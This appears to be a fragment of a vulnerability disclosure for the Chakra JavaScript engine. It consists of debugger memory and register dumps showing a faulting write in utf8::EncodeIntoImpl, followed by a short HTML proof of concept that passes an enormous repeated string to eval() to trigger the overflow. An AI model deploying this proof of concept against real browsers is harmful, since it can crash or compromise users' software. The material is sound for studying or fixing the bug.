61 61 61aaaaaaaaaaaaaaaa 0000023d</code>22d80fb061 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61aaaaaaaaaaaaaaaa 0000023d<code>22d80fc061 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61aaaaaaaaaaaaaaaa 0000023d</code>22d80fd061 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61aaaaaaaaaaaaaaaa 0000023d<code>22d80fe061 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61aaaaaaaaaaaaaaaa 0000023d</code>22d80ff061 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61aaaaaaaaaaaaaaaa 0:016> r rax=0000000000000061 rbx=000000bb058fb4f0 rcx=0000000000006100 rdx=0000000061616161 rsi=0000000000000002 rdi=000000bb058fb000 rip=00007ffcdbdb69e5 rsp=000000bb058fb700 rbp=0000023d1f937b60 r8=0000023d22d81000r9=0000023d330e4fc8 r10=000000005555462c r11=0000023d22d80030 r12=0000000000000000 r13=0000000000000000 r14=0000000000000000 r15=000000bb058fbd00 iopl=0 nv up ei pl nz na pe nc cs=0033ss=002bds=002bes=002bfs=0053gs=002b efl=00010200 chakra!utf8::EncodeIntoImpl<1>+0xb5: 00007ffc<code>dbdb69e5 418910mov dword ptr [r8],edx ds:0000023d</code>22d81000=???????? --> <html> <head> <title> POC </title> </head> <script> //alert(''); var code = 'a'.repeat(0x55555600); eval(code); </script> </html> |